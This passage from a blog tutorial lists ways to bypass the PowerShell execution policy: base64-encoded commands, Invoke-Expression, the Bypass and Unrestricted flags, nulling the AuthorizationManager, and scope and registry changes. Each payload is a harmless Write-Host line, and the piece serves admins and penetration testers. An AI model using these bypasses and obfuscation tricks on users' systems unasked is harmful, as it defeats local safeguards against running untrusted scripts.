compression method for reducing the size of the encoded commands if they
start getting too long.</p>
<p> <em>Example 1: Full command</em></p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b81910645126" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b81910645126-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b81910645126-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b81910645126-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b81910645126-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b81910645126-2"><span class="crayon-sy">$</span><span class="crayon-v">command</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-s">"Write-Host 'My voice is my passport, verify me.'"</span><span class="crayon-h"> </span><span class="crayon-sy">$</span><span class="crayon-v">bytes</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-sy">[</span><span class="crayon-v">System</span><span class="crayon-sy">.</span><span class="crayon-v">Text</span><span class="crayon-sy">.</span><span class="crayon-v">Encoding</span><span class="crayon-sy">]</span><span class="crayon-o">::</span><span class="crayon-v">Unicode</span><span class="crayon-sy">.</span><span class="crayon-e">GetBytes</span><span class="crayon-sy">(</span><span class="crayon-sy">$</span><span class="crayon-v">command</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-sy">$</span><span class="crayon-v">encodedCommand</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-sy">[</span><span class="crayon-v">Convert</span><span class="crayon-sy">]</span><span class="crayon-o">::</span><span class="crayon-e">ToBase64String</span><span class="crayon-sy">(</span><span class="crayon-sy">$</span><span class="crayon-v">bytes</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-v">powershell</span><span class="crayon-sy">.</span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span 
class="crayon-i">EncodedCommand</span><span class="crayon-h"> </span><span class="crayon-sy">$</span><span class="crayon-i">encodedCommand</span></div><div class="crayon-line" id="crayon-54d381c939b81910645126-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0015 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_10.png"></p>
<p> <em>Example 2: Short command using encoded string</em></p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b8d563718853" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b8d563718853-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b8d563718853-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b8d563718853-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b8d563718853-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b8d563718853-2"><span class="crayon-v">powershell</span><span class="crayon-sy">.</span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">Enc </span><span class="crayon-i">VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA</span></div><div class="crayon-line" id="crayon-54d381c939b8d563718853-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0006 seconds] -->
<p> </p></li>
<li>
<h4>Use the Invoke-Command Command</h4>
<p> This is a fun option that I came across on the Obscuresec blog.
It's typically executed through an interactive PowerShell console or
one liner using the “Command” switch, but the cool thing is that it can
be used to execute commands against remote systems where PowerShell
remoting has been enabled. This technique does not result in a
configuration change or require writing to disk.</p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b93360336458" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b93360336458-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b93360336458-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b93360336458-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b93360336458-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b93360336458-2"><span class="crayon-e">invoke</span><span class="crayon-o">-</span><span class="crayon-e">command</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">scriptblock</span><span class="crayon-h"> </span><span class="crayon-sy">{</span><span class="crayon-v">Write</span><span class="crayon-o">-</span><span class="crayon-i">Host</span><span class="crayon-h"> </span><span class="crayon-s">"My voice is my passport, verify me."</span><span class="crayon-sy">}</span></div><div class="crayon-line" id="crayon-54d381c939b93360336458-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0005 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_11.png"></p>
<p> Based on the Obscuresec blog, the command below can also be used
to grab the execution policy from a remote computer and apply it to the
local computer.</p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b98014955092" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b98014955092-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b98014955092-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b98014955092-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b98014955092-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b98014955092-2"><span class="crayon-e">invoke</span><span class="crayon-o">-</span><span class="crayon-e">command</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">computername</span><span class="crayon-h"> </span><span class="crayon-e">Server01</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">scriptblock</span><span class="crayon-h"> </span><span class="crayon-sy">{</span><span class="crayon-v">get</span><span class="crayon-o">-</span><span class="crayon-v">executionpolicy</span><span class="crayon-sy">}</span><span class="crayon-h"> </span><span class="crayon-o">|</span><span class="crayon-h"> </span><span class="crayon-v">set</span><span class="crayon-o">-</span><span class="crayon-v">executionpolicy</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">force</span></div><div class="crayon-line" id="crayon-54d381c939b98014955092-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0008 seconds] -->
<p> </p></li>
<li>
<h4>Use the Invoke-Expression Command</h4>
<p> This is another one that's typically executed through an
interactive PowerShell console or one liner using the “Command” switch.
This technique does not result in a configuration change or require
writing to disk. Below I've listed a few common ways to use
Invoke-Expression to bypass the execution policy. (In the listings on this page,
<code>.runme.ps1</code> appears to be <code>.\runme.ps1</code> with the backslash lost in rendering.)</p>
<p> <em>Example 1: Full command using Get-Content</em></p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939b9d865507168" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b9d865507168-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b9d865507168-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b9d865507168-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b9d865507168-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b9d865507168-2"><span class="crayon-v">Get</span><span class="crayon-o">-</span><span class="crayon-i">Content</span><span class="crayon-h"> </span><span class="crayon-sy">.</span><span class="crayon-v">runme</span><span class="crayon-sy">.</span><span class="crayon-v">ps1</span><span class="crayon-h"> </span><span class="crayon-o">|</span><span class="crayon-h"> </span><span class="crayon-v">Invoke</span><span class="crayon-o">-</span><span class="crayon-i">Expression</span></div><div class="crayon-line" id="crayon-54d381c939b9d865507168-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0005 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_12.png"></p>
<p> <em>Example 2: Short command using Get-Content</em></p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939ba1612808832" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939ba1612808832-1">1</div><div class="crayon-num" data-line="crayon-54d381c939ba1612808832-2">2</div><div class="crayon-num" data-line="crayon-54d381c939ba1612808832-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939ba1612808832-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939ba1612808832-2"><span class="crayon-i">GC</span><span class="crayon-h"> </span><span class="crayon-sy">.</span><span class="crayon-v">runme</span><span class="crayon-sy">.</span><span class="crayon-v">ps1</span><span class="crayon-h"> </span><span class="crayon-o">|</span><span class="crayon-h"> </span><span class="crayon-i">iex</span></div><div class="crayon-line" id="crayon-54d381c939ba1612808832-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0004 seconds] -->
<p> </p></li>
<li>
<h4>Use the “Bypass” Execution Policy Flag</h4>
<p> This is a nice flag added by Microsoft that will bypass the
execution policy when you're executing scripts from a file. When this
flag is used Microsoft states that “Nothing is blocked and there are no
warnings or prompts”. This technique does not result in a configuration
change or require writing to disk.</p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939ba6531430376" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939ba6531430376-1">1</div><div class="crayon-num" data-line="crayon-54d381c939ba6531430376-2">2</div><div class="crayon-num" data-line="crayon-54d381c939ba6531430376-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939ba6531430376-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939ba6531430376-2"><span class="crayon-v">PowerShell</span><span class="crayon-sy">.</span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">ExecutionPolicy </span><span class="crayon-v">Bypass</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">File</span><span class="crayon-h"> </span><span class="crayon-sy">.</span><span class="crayon-v">runme</span><span class="crayon-sy">.</span><span class="crayon-i">ps1</span></div><div class="crayon-line" id="crayon-54d381c939ba6531430376-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0005 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_13.png"></p></li>
<li>
<h4>Use the “Unrestricted” Execution Policy Flag</h4>
<p> This is similar to the “Bypass” flag. However, when this flag is
used Microsoft states that it “Loads all configuration files and runs
all scripts. If you run an unsigned script that was downloaded from the
Internet, you are prompted for permission before it runs.” This
technique does not result in a configuration change or require writing
to disk.</p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939bab127547528" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939bab127547528-1">1</div><div class="crayon-num" data-line="crayon-54d381c939bab127547528-2">2</div><div class="crayon-num" data-line="crayon-54d381c939bab127547528-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939bab127547528-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939bab127547528-2"><span class="crayon-v">PowerShell</span><span class="crayon-sy">.</span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">ExecutionPolicy </span><span class="crayon-v">UnRestricted</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">File</span><span class="crayon-h"> </span><span class="crayon-sy">.</span><span class="crayon-v">runme</span><span class="crayon-sy">.</span><span class="crayon-i">ps1</span></div><div class="crayon-line" id="crayon-54d381c939bab127547528-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0005 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_14.png"></p></li>
<li>
<h4>Use the “Remote-Signed” Execution Policy Flag</h4>
<p> Create your script then follow the tutorial <a target="_blank" href="http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html">written by Carlos Perez</a> to sign it. Finally, run it using the command below (PowerShell spells the policy value <code>RemoteSigned</code>, without a hyphen):</p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939bb0274600477" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939bb0274600477-1">1</div><div class="crayon-num" data-line="crayon-54d381c939bb0274600477-2">2</div><div class="crayon-num" data-line="crayon-54d381c939bb0274600477-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939bb0274600477-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939bb0274600477-2"><span class="crayon-v">PowerShell</span><span class="crayon-sy">.</span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">ExecutionPolicy </span><span class="crayon-v">Remote</span><span class="crayon-o">-</span><span class="crayon-t">signed</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">File</span><span class="crayon-h"> </span><span class="crayon-sy">.</span><span class="crayon-v">runme</span><span class="crayon-sy">.</span><span class="crayon-i">ps1</span></div><div class="crayon-line" id="crayon-54d381c939bb0274600477-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0006 seconds] -->
<p> </p></li>
<li>
<h4>Disable ExecutionPolicy by Swapping out the AuthorizationManager</h4>
<p> This is a really creative one I came across on <a target="_blank" href="http://www.nivot.org/">http://www.nivot.org</a>.
The function below can be executed via an interactive PowerShell
console or by using the “command” switch. Once the function is called
it will swap out the “AuthorizationManager” with null. As a result, the
execution policy is essentially set to unrestricted for the remainder of
the session. This technique does not result in a persistent
configuration change or require writing to disk. However, the change
will be applied for the duration of the session.</p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939bb5783344665" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939bb5783344665-1">1</div><div class="crayon-num" data-line="crayon-54d381c939bb5783344665-2">2</div><div class="crayon-num" data-line="crayon-54d381c939bb5783344665-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939bb5783344665-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939bb5783344665-2"><span class="crayon-t">function</span><span class="crayon-h"> </span><span class="crayon-e">Disable</span><span class="crayon-o">-</span><span class="crayon-e">ExecutionPolicy</span><span class="crayon-h"> </span><span class="crayon-sy">{</span><span class="crayon-sy">(</span><span class="crayon-sy">$</span><span class="crayon-v">ctx</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-sy">$</span><span class="crayon-v">executioncontext</span><span class="crayon-sy">.</span><span class="crayon-e">gettype</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-e">getfield</span><span class="crayon-sy">(</span><span class="crayon-s">"_context"</span><span class="crayon-sy">,</span><span class="crayon-s">"nonpublic,instance"</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-e">getvalue</span><span class="crayon-sy">(</span><span class="crayon-h"> </span><span class="crayon-sy">$</span><span class="crayon-v">executioncontext</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-e">gettype</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-e">getfield</span><span class="crayon-sy">(</span><span class="crayon-s">"_authorizationManager"</span><span class="crayon-sy">,</span><span class="crayon-s">"nonpublic,instance"</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-e">setvalue</span><span 
class="crayon-sy">(</span><span class="crayon-sy">$</span><span class="crayon-v">ctx</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-r">new</span><span class="crayon-o">-</span><span class="crayon-t">object</span><span class="crayon-h"> </span><span class="crayon-v">System</span><span class="crayon-sy">.</span><span class="crayon-v">Management</span><span class="crayon-sy">.</span><span class="crayon-v">Automation</span><span class="crayon-sy">.</span><span class="crayon-i">AuthorizationManager</span><span class="crayon-h"> </span><span class="crayon-s">"Microsoft.PowerShell"</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-sy">}</span><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-v">Disable</span><span class="crayon-o">-</span><span class="crayon-i">ExecutionPolicy</span><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-sy">.</span><span class="crayon-v">runme</span><span class="crayon-sy">.</span><span class="crayon-i">ps1</span></div><div class="crayon-line" id="crayon-54d381c939bb5783344665-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0021 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_15.png"></p></li>
<li>
<h4>Set the ExecutionPolicy for the Process Scope</h4>
<p> As we saw in the introduction, the execution policy can be
applied at many levels. This includes the process which you have
control over. Using this technique the execution policy can be set to
unrestricted for the duration of your Session. Also, it does not result
in a configuration change, or require writing to the disk. I
originally found this technique on the <a target="_blank" href="http://roo7break.co.uk/?page_id=611">r007break blog</a>.</p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939bba377269280" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939bba377269280-1">1</div><div class="crayon-num" data-line="crayon-54d381c939bba377269280-2">2</div><div class="crayon-num" data-line="crayon-54d381c939bba377269280-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939bba377269280-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939bba377269280-2"><span class="crayon-v">Set</span><span class="crayon-o">-</span><span class="crayon-e">ExecutionPolicy </span><span class="crayon-v">Bypass</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">Scope </span><span class="crayon-i">Process</span></div><div class="crayon-line" id="crayon-54d381c939bba377269280-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0004 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_16.png"></p></li>
<li>
<h4>Set the ExecutionPolicy for the CurrentUser Scope via Command</h4>
<p> This option is similar to the process scope, but applies the
setting to the current user's environment persistently by modifying a
registry key. Unlike the process scope, that makes it a configuration
change that is written to disk and stays in place after the session ends. I originally found this technique on the <a target="_blank" href="http://roo7break.co.uk/?page_id=611">r007break blog</a>.</p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939bbf890860620" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939bbf890860620-1">1</div><div class="crayon-num" data-line="crayon-54d381c939bbf890860620-2">2</div><div class="crayon-num" data-line="crayon-54d381c939bbf890860620-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939bbf890860620-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939bbf890860620-2"><span class="crayon-v">Set</span><span class="crayon-o">-</span><span class="crayon-v">Executionpolicy</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">Scope </span><span class="crayon-v">CurrentUser</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">ExecutionPolicy </span><span class="crayon-i">UnRestricted</span></div><div class="crayon-line" id="crayon-54d381c939bbf890860620-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0006 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_17.png"></p></li>
<li>
<h4>Set the ExecutionPolicy for the CurrentUser Scope via the Registry</h4>
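<p> In this example I've shown how to change the execution policy
for the current user's environment persistently by modifying a registry
key directly. The backslashes in the path below were lost when the page was rendered; the key is
<code>HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell</code>.</p>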
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939bc4334089823" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939bc4334089823-1">1</div><div class="crayon-num" data-line="crayon-54d381c939bc4334089823-2">2</div><div class="crayon-num" data-line="crayon-54d381c939bc4334089823-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939bc4334089823-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939bc4334089823-2"><span class="crayon-v">HKEY_CURRENT_USERSoftwareMicrosoftPowerShell1ShellIdsMicrosoft</span><span class="crayon-sy">.</span><span class="crayon-i">PowerShell</span></div><div class="crayon-line" id="crayon-54d381c939bc4334089823-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0003 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_18.png"></p></li>
</ol>
<h3>Wrap Up Summary</h3>
<p> I think the theme here is that the execution policy doesn't have to
be a hurdle for developers, admins, or pentesters. Microsoft never
intended it to be a security control, which is why there are so many
options for bypassing it. For the same reason, defenders shouldn't count
on it to stop untrusted scripts; that job belongs to controls built for
it, such as application whitelisting and PowerShell logging. Microsoft was nice enough to provide some
native options and the security community has also come up with some
really fun tricks. Thanks to all of those people who have contributed
through blogs and presentations. To the rest, good luck in all your
PowerShell adventures and don't forget to hack responsibly. <img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/icon_wink.gif" alt=";)" class="wp-smiley"> </p>
<h3>References</h3>
<ul>
